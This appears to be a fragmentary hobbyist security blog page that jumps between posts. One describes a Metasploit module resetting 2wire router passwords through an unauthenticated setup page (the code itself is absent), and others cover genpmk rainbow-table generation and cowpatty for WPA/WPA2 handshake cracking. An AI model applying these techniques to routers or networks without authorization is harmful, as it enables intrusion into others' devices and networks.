Wednesday, June 22, 2011

UPDATE:This module is now a part of metasploit. just run msfupdate and it should be under auxiliary/admin/2wire/xslt_password_reset. For details, see here

Here is a metaploit module I coded to reset the password on a 2wire router. It uses a setup wizard page that doesn't verify if the user is authenticated nor remove itself after first time setup. This can be exploited to reset the password. Without further delay, here is the code.

on my ubuntu box I placed this under /opt/metasploit3/msf3/modules/auxiliary/admin/2wire/2wirepasswordreset.rb

So, to generate a rainbow table we need to provide a dictionary, an SSID, and a output file for it to write the hashes. so using the above we can do the following

genpmk -f final-wordlist.txt -s HackMe -d HackMe

This will make it create a Rainbow table called "HackMe" which will contain hashes of all the passwords in the file "final-wordlist.txt" salted with the SSID "HackMe". The output of the shell should update as every 1,000 hashes are created.

The whole process isn't actually all that bad for time and the file size for a rainbow table using the password file I suggest is ~40 MB. Not to bad considering the speed boost it will give when you go to crack it.

Cowpatty is a great tool for cracking WPA/WPA2 keys via either a dictionary attack or via rainbow tables. All it needs to see it a client connect to the network (this is called a "handshake"). However cowpatty isn't perfect and has a problem with reading handshakes incorrectly. After looking into this I found a way to install it with the patch on my Ubuntu box.

First we need to download the required files. If you already have them you can skip them.